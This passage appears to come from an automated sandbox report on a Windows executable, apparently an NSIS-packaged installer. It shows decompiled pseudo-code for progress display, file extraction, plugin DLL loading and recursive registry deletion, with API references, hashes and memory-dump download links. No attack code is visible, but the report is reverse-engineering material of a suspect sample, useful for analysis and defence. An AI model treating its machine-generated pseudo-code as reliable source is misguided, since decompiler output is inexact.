                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\Public
                                                                                                                                                                                                              • API String ID: 3449924974-2845914341
                                                                                                                                                                                                              • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                                                                                                              • Instruction ID: d6c2dc8a5c3265a730c97c9ba519fe28ff3708ad137b47d6a6340678ab851e8b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 60011A72D00219DADF10DFA1C944BEFBBB8EF04354F04803ADA45B6290E7789658CF99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                              			E00402DBA(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                                              				void* _t11;
                                                                                                                                                                                                              				CHAR* _t19;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				if(_a8 == 0x110) {
                                                                                                                                                                                                              					SetTimer(_a4, 1, 0xfa, 0);
                                                                                                                                                                                                              					_a8 = 0x113;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				if(_a8 == 0x113) {
                                                                                                                                                                                                              					_t11 = E00402E36();
                                                                                                                                                                                                              					_t19 = "unpacking data: %d%%";
                                                                                                                                                                                                              					if( *0x424754 == 0) {
                                                                                                                                                                                                              						_t19 = "verifying installer: %d%%";
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					wsprintfA( &_v68, _t19, _t11);
                                                                                                                                                                                                              					SetWindowTextA(_a4,  &_v68);
                                                                                                                                                                                                              					SetDlgItemTextA(_a4, 0x406,  &_v68);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}






                                                                                                                                                                                                              0x00402dc7
                                                                                                                                                                                                              0x00402dd5
                                                                                                                                                                                                              0x00402ddb
                                                                                                                                                                                                              0x00402ddb
                                                                                                                                                                                                              0x00402de9
                                                                                                                                                                                                              0x00402deb
                                                                                                                                                                                                              0x00402df7
                                                                                                                                                                                                              0x00402dfc
                                                                                                                                                                                                              0x00402dfe
                                                                                                                                                                                                              0x00402dfe
                                                                                                                                                                                                              0x00402e09
                                                                                                                                                                                                              0x00402e19
                                                                                                                                                                                                              0x00402e2b
                                                                                                                                                                                                              0x00402e2b
                                                                                                                                                                                                              0x00402e33

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DD5
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00402E09
                                                                                                                                                                                                              • SetWindowTextA.USER32(?,?), ref: 00402E19
                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E2B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                              • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                                                                                                              • API String ID: 1451636040-1158693248
                                                                                                                                                                                                              • Opcode ID: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                                                                                                                                                                              • Instruction ID: 5924424b8475f9adf48b5715c1e1f77af8692632bd00ddb5f136e7bd4fbbb8aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 682236bfa9d44e469b32297ddf894a90f4f99da74b05dcaaf7480c0445501217
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 36F01D7154020DFBEF20AF60DE0ABAE3769EB54345F00803AFA16B51D0DBB899558B99
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 93%
                                                                                                                                                                                                              			E004027DF(void* __ebx, void* __eflags) {
                                                                                                                                                                                                              				void* _t26;
                                                                                                                                                                                                              				long _t31;
                                                                                                                                                                                                              				void* _t45;
                                                                                                                                                                                                              				void* _t49;
                                                                                                                                                                                                              				void* _t51;
                                                                                                                                                                                                              				void* _t54;
                                                                                                                                                                                                              				void* _t55;
                                                                                                                                                                                                              				void* _t56;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t45 = __ebx;
                                                                                                                                                                                                              				 *((intOrPtr*)(_t56 - 0xc)) = 0xfffffd66;
                                                                                                                                                                                                              				_t50 = E00402BCE(0xfffffff0);
                                                                                                                                                                                                              				 *(_t56 - 0x78) = _t23;
                                                                                                                                                                                                              				if(E00405C2D(_t50) == 0) {
                                                                                                                                                                                                              					E00402BCE(0xffffffed);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				E00405D9C(_t50);
                                                                                                                                                                                                              				_t26 = E00405DC1(_t50, 0x40000000, 2);
                                                                                                                                                                                                              				 *(_t56 + 8) = _t26;
                                                                                                                                                                                                              				if(_t26 != 0xffffffff) {
                                                                                                                                                                                                              					_t31 =  *0x424758;
                                                                                                                                                                                                              					 *(_t56 - 0x30) = _t31;
                                                                                                                                                                                                              					_t49 = GlobalAlloc(0x40, _t31);
                                                                                                                                                                                                              					if(_t49 != _t45) {
                                                                                                                                                                                                              						E00403419(_t45);
                                                                                                                                                                                                              						E00403403(_t49,  *(_t56 - 0x30));
                                                                                                                                                                                                              						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
                                                                                                                                                                                                              						 *(_t56 - 0x38) = _t54;
                                                                                                                                                                                                              						if(_t54 != _t45) {
                                                                                                                                                                                                              							E00403192(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
                                                                                                                                                                                                              							while( *_t54 != _t45) {
                                                                                                                                                                                                              								_t47 =  *_t54;
                                                                                                                                                                                                              								_t55 = _t54 + 8;
                                                                                                                                                                                                              								 *(_t56 - 0x8c) =  *_t54;
                                                                                                                                                                                                              								E00405D7C( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
                                                                                                                                                                                                              								_t54 = _t55 +  *(_t56 - 0x8c);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							GlobalFree( *(_t56 - 0x38));
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						E00405E68( *(_t56 + 8), _t49,  *(_t56 - 0x30));
                                                                                                                                                                                                              						GlobalFree(_t49);
                                                                                                                                                                                                              						 *((intOrPtr*)(_t56 - 0xc)) = E00403192(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					CloseHandle( *(_t56 + 8));
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t51 = 0xfffffff3;
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t56 - 0xc)) < _t45) {
                                                                                                                                                                                                              					_t51 = 0xffffffef;
                                                                                                                                                                                                              					DeleteFileA( *(_t56 - 0x78));
                                                                                                                                                                                                              					 *((intOrPtr*)(_t56 - 4)) = 1;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_push(_t51);
                                                                                                                                                                                                              				E00401423();
                                                                                                                                                                                                              				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t56 - 4));
                                                                                                                                                                                                              				return 0;
                                                                                                                                                                                                              			}











                                                                                                                                                                                                              0x004027df
                                                                                                                                                                                                              0x004027e1
                                                                                                                                                                                                              0x004027ed
                                                                                                                                                                                                              0x004027f0
                                                                                                                                                                                                              0x004027fa
                                                                                                                                                                                                              0x004027fe
                                                                                                                                                                                                              0x004027fe
                                                                                                                                                                                                              0x00402804
                                                                                                                                                                                                              0x00402811
                                                                                                                                                                                                              0x00402819
                                                                                                                                                                                                              0x0040281c
                                                                                                                                                                                                              0x00402822
                                                                                                                                                                                                              0x00402830
                                                                                                                                                                                                              0x00402835
                                                                                                                                                                                                              0x00402839
                                                                                                                                                                                                              0x0040283c
                                                                                                                                                                                                              0x00402845
                                                                                                                                                                                                              0x00402851
                                                                                                                                                                                                              0x00402855
                                                                                                                                                                                                              0x00402858
                                                                                                                                                                                                              0x00402862
                                                                                                                                                                                                              0x00402887
                                                                                                                                                                                                              0x00402869
                                                                                                                                                                                                              0x0040286e
                                                                                                                                                                                                              0x00402876
                                                                                                                                                                                                              0x0040287c
                                                                                                                                                                                                              0x00402881
                                                                                                                                                                                                              0x00402881
                                                                                                                                                                                                              0x0040288e
                                                                                                                                                                                                              0x0040288e
                                                                                                                                                                                                              0x0040289b
                                                                                                                                                                                                              0x004028a1
                                                                                                                                                                                                              0x004028b3
                                                                                                                                                                                                              0x004028b3
                                                                                                                                                                                                              0x004028b9
                                                                                                                                                                                                              0x004028b9
                                                                                                                                                                                                              0x004028c4
                                                                                                                                                                                                              0x004028c5
                                                                                                                                                                                                              0x004028c9
                                                                                                                                                                                                              0x004028cd
                                                                                                                                                                                                              0x004028d3
                                                                                                                                                                                                              0x004028d3
                                                                                                                                                                                                              0x004028da
                                                                                                                                                                                                              0x004022dd
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402833
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040284F
                                                                                                                                                                                                              • GlobalFree.KERNEL32(?), ref: 0040288E
                                                                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 004028A1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 004028B9
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 004028CD
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2667972263-0
                                                                                                                                                                                                              • Opcode ID: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                                                                                                                                                                              • Instruction ID: d0efecf462ec4b8749248d5ce184abccdfd1d8ac98bc27b14fb78a8abc9ee6f4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9472795047facdfc58deb84b31b226fbb417f33134a7d8d5be020c0554978550
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A5217C72800128BBDB216FA5CE48D9E7E79EF09364F10823EF461762E1C67949418BA8
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 77%
                                                                                                                                                                                                              			E00404AF5(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                                                                                                              				char _v36;
                                                                                                                                                                                                              				char _v68;
                                                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                              				void* __esi;
                                                                                                                                                                                                              				signed int _t21;
                                                                                                                                                                                                              				signed int _t22;
                                                                                                                                                                                                              				void* _t29;
                                                                                                                                                                                                              				void* _t31;
                                                                                                                                                                                                              				void* _t32;
                                                                                                                                                                                                              				void* _t41;
                                                                                                                                                                                                              				signed int _t43;
                                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                                              				signed int _t50;
                                                                                                                                                                                                              				signed int _t51;
                                                                                                                                                                                                              				signed int _t53;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t21 = _a16;
                                                                                                                                                                                                              				_t51 = _a12;
                                                                                                                                                                                                              				_t41 = 0xffffffdc;
                                                                                                                                                                                                              				if(_t21 == 0) {
                                                                                                                                                                                                              					_push(0x14);
                                                                                                                                                                                                              					_pop(0);
                                                                                                                                                                                                              					_t22 = _t51;
                                                                                                                                                                                                              					if(_t51 < 0x100000) {
                                                                                                                                                                                                              						_push(0xa);
                                                                                                                                                                                                              						_pop(0);
                                                                                                                                                                                                              						_t41 = 0xffffffdd;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t51 < 0x400) {
                                                                                                                                                                                                              						_t41 = 0xffffffde;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if(_t51 < 0xffff3333) {
                                                                                                                                                                                                              						_t50 = 0x14;
                                                                                                                                                                                                              						asm("cdq");
                                                                                                                                                                                                              						_t22 = 1 / _t50 + _t51;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_t23 = _t22 & 0x00ffffff;
                                                                                                                                                                                                              					_t53 = _t22 >> 0;
                                                                                                                                                                                                              					_t43 = 0xa;
                                                                                                                                                                                                              					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
                                                                                                                                                                                                              					_t47 = 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t29 = E004062BB(_t41, _t47, _t53,  &_v36, 0xffffffdf);
                                                                                                                                                                                                              				_t31 = E004062BB(_t41, _t47, _t53,  &_v68, _t41);
                                                                                                                                                                                                              				_t32 = E004062BB(_t41, _t47, 0x420d50, 0x420d50, _a8);
                                                                                                                                                                                                              				wsprintfA(_t32 + lstrlenA(0x420d50), "%u.%u%s%s", _t53, _t47, _t31, _t29);
                                                                                                                                                                                                              				return SetDlgItemTextA( *0x423f18, _a4, 0x420d50);
                                                                                                                                                                                                              			}



















                                                                                                                                                                                                              0x00404afb
                                                                                                                                                                                                              0x00404b00
                                                                                                                                                                                                              0x00404b08
                                                                                                                                                                                                              0x00404b09
                                                                                                                                                                                                              0x00404b16
                                                                                                                                                                                                              0x00404b1e
                                                                                                                                                                                                              0x00404b1f
                                                                                                                                                                                                              0x00404b21
                                                                                                                                                                                                              0x00404b23
                                                                                                                                                                                                              0x00404b25
                                                                                                                                                                                                              0x00404b28
                                                                                                                                                                                                              0x00404b28
                                                                                                                                                                                                              0x00404b2f
                                                                                                                                                                                                              0x00404b35
                                                                                                                                                                                                              0x00404b35
                                                                                                                                                                                                              0x00404b3c
                                                                                                                                                                                                              0x00404b43
                                                                                                                                                                                                              0x00404b46
                                                                                                                                                                                                              0x00404b49
                                                                                                                                                                                                              0x00404b49
                                                                                                                                                                                                              0x00404b4d
                                                                                                                                                                                                              0x00404b5d
                                                                                                                                                                                                              0x00404b5f
                                                                                                                                                                                                              0x00404b62
                                                                                                                                                                                                              0x00404b0b
                                                                                                                                                                                                              0x00404b0b
                                                                                                                                                                                                              0x00404b12
                                                                                                                                                                                                              0x00404b12
                                                                                                                                                                                                              0x00404b6a
                                                                                                                                                                                                              0x00404b75
                                                                                                                                                                                                              0x00404b8b
                                                                                                                                                                                                              0x00404b9b
                                                                                                                                                                                                              0x00404bb7

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00404B9B
                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ItemTextlstrlenwsprintf
                                                                                                                                                                                                              • String ID: %u.%u%s%s$PB
                                                                                                                                                                                                              • API String ID: 3540041739-838025833
                                                                                                                                                                                                              • Opcode ID: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                                                                                                                                                                              • Instruction ID: 5179c0f035392565bdab74c0efbe7b8420b5ea1509705373073e4f645d5961bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3412c4a7531a78c99129b4ba82c7811b22dc935ff741013f23db2bb1ff9efe52
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6011B773A0412437DB10656D9C45FAE329CDB85374F25023BFA26F31D1E978DC1282E9
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                                                                              			E0040209D(void* __ebx, void* __eflags) {
                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                              				struct HINSTANCE__* _t30;
                                                                                                                                                                                                              				CHAR* _t32;
                                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                                              				void* _t34;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t27 = __ebx;
                                                                                                                                                                                                              				asm("sbb eax, 0x424818");
                                                                                                                                                                                                              				 *(_t34 - 4) = 1;
                                                                                                                                                                                                              				if(__eflags < 0) {
                                                                                                                                                                                                              					_push(0xffffffe7);
                                                                                                                                                                                                              					L15:
                                                                                                                                                                                                              					E00401423();
                                                                                                                                                                                                              					L16:
                                                                                                                                                                                                              					 *0x4247e8 =  *0x4247e8 +  *(_t34 - 4);
                                                                                                                                                                                                              					return 0;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t32 = E00402BCE(0xfffffff0);
                                                                                                                                                                                                              				 *(_t34 + 8) = E00402BCE(1);
                                                                                                                                                                                                              				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                                                                                                                                              					L3:
                                                                                                                                                                                                              					_t30 = LoadLibraryExA(_t32, _t27, 8);
                                                                                                                                                                                                              					if(_t30 == _t27) {
                                                                                                                                                                                                              						_push(0xfffffff6);
                                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					L4:
                                                                                                                                                                                                              					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                                                                                                                                              					if(_t33 == _t27) {
                                                                                                                                                                                                              						E0040534F(0xfffffff7,  *(_t34 + 8));
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						 *(_t34 - 4) = _t27;
                                                                                                                                                                                                              						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                                                                                                                                              							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB");
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                                                                                                                                              							if( *_t33() != 0) {
                                                                                                                                                                                                              								 *(_t34 - 4) = 1;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
                                                                                                                                                                                                              						FreeLibrary(_t30);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L16;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t30 = GetModuleHandleA(_t32);
                                                                                                                                                                                                              				if(_t30 != __ebx) {
                                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				goto L3;
                                                                                                                                                                                                              			}








                                                                                                                                                                                                              0x0040209d
                                                                                                                                                                                                              0x0040209d
                                                                                                                                                                                                              0x004020a2
                                                                                                                                                                                                              0x004020a9
                                                                                                                                                                                                              0x00402164
                                                                                                                                                                                                              0x004022dd
                                                                                                                                                                                                              0x004022dd
                                                                                                                                                                                                              0x00402a5a
                                                                                                                                                                                                              0x00402a5d
                                                                                                                                                                                                              0x00402a69
                                                                                                                                                                                                              0x00402a69
                                                                                                                                                                                                              0x004020b8
                                                                                                                                                                                                              0x004020c2
                                                                                                                                                                                                              0x004020c5
                                                                                                                                                                                                              0x004020d4
                                                                                                                                                                                                              0x004020de
                                                                                                                                                                                                              0x004020e2
                                                                                                                                                                                                              0x0040215d
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040215d
                                                                                                                                                                                                              0x004020e4
                                                                                                                                                                                                              0x004020ed
                                                                                                                                                                                                              0x004020f1
                                                                                                                                                                                                              0x00402135
                                                                                                                                                                                                              0x004020f3
                                                                                                                                                                                                              0x004020f6
                                                                                                                                                                                                              0x004020f9
                                                                                                                                                                                                              0x00402129
                                                                                                                                                                                                              0x004020fb
                                                                                                                                                                                                              0x004020fe
                                                                                                                                                                                                              0x00402107
                                                                                                                                                                                                              0x00402109
                                                                                                                                                                                                              0x00402109
                                                                                                                                                                                                              0x00402107
                                                                                                                                                                                                              0x004020f9
                                                                                                                                                                                                              0x0040213d
                                                                                                                                                                                                              0x00402152
                                                                                                                                                                                                              0x00402152
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040213d
                                                                                                                                                                                                              0x004020ce
                                                                                                                                                                                                              0x004020d2
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                                                                                                                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                                                                                                                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                                                                                                                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020E8
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                                                                                                                              • String ID: GB
                                                                                                                                                                                                              • API String ID: 2987980305-3285937634
                                                                                                                                                                                                              • Opcode ID: f6d6a6ee35adb547828d4ce43f756b76f7f39e1cf1e9ea6ef2c6164503e1a030
                                                                                                                                                                                                              • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f6d6a6ee35adb547828d4ce43f756b76f7f39e1cf1e9ea6ef2c6164503e1a030
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 48%
                                                                                                                                                                                                              			E00402CD0(void* __eflags, void* _a4, char* _a8, signed int _a12) {
                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                              				int _v12;
                                                                                                                                                                                                              				char _v276;
                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                              				signed int _t33;
                                                                                                                                                                                                              				intOrPtr* _t35;
                                                                                                                                                                                                              				signed int _t45;
                                                                                                                                                                                                              				signed int _t46;
                                                                                                                                                                                                              				signed int _t47;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t46 = _a12;
                                                                                                                                                                                                              				_t47 = _t46 & 0x00000300;
                                                                                                                                                                                                              				_t45 = _t46 & 0x00000001;
                                                                                                                                                                                                              				_t27 = E004060AE(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
                                                                                                                                                                                                              				if(_t27 == 0) {
                                                                                                                                                                                                              					if((_a12 & 0x00000002) == 0) {
                                                                                                                                                                                                              						L3:
                                                                                                                                                                                                              						_push(0x105);
                                                                                                                                                                                                              						_push( &_v276);
                                                                                                                                                                                                              						_push(0);
                                                                                                                                                                                                              						while(RegEnumKeyA(_v8, ??, ??, ??) == 0) {
                                                                                                                                                                                                              							__eflags = _t45;
                                                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                                                              								L10:
                                                                                                                                                                                                              								RegCloseKey(_v8);
                                                                                                                                                                                                              								return 0x3eb;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t33 = E00402CD0(__eflags, _v8,  &_v276, _a12);
                                                                                                                                                                                                              							__eflags = _t33;
                                                                                                                                                                                                              							if(_t33 != 0) {
                                                                                                                                                                                                              								break;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_push(0x105);
                                                                                                                                                                                                              							_push( &_v276);
                                                                                                                                                                                                              							_push(_t45);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						RegCloseKey(_v8);
                                                                                                                                                                                                              						_t35 = E00406631(3);
                                                                                                                                                                                                              						if(_t35 != 0) {
                                                                                                                                                                                                              							return  *_t35(_a4, _a8, _t47, 0);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						return RegDeleteKeyA(_a4, _a8);
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					_v12 = 0;
                                                                                                                                                                                                              					if(RegEnumValueA(_v8, 0,  &_v276,  &_v12, 0, 0, 0, 0) != 0x103) {
                                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L3;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				return _t27;
                                                                                                                                                                                                              			}












                                                                                                                                                                                                              0x00402cdb
                                                                                                                                                                                                              0x00402ce4
                                                                                                                                                                                                              0x00402ced
                                                                                                                                                                                                              0x00402cf9
                                                                                                                                                                                                              0x00402d02
                                                                                                                                                                                                              0x00402d0c
                                                                                                                                                                                                              0x00402d31
                                                                                                                                                                                                              0x00402d37
